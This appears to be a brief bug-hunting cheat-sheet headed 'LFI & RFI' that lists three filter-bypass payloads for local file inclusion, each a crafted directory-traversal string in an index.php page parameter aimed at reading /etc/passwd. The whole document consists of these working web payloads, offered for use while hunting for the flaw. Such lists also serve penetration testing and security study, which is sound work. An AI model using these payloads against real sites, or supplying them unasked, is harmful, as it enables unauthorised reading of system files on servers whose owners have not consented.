# LFI & RFI

```
Some filter bypass payload list while hunting for LFi vulnerability


→index.php?page=....//....//etc/passwd
→index.php?page=..///////..////..//////etc/passwd
→index.php?page=/var/www/../../etc/passwd
```
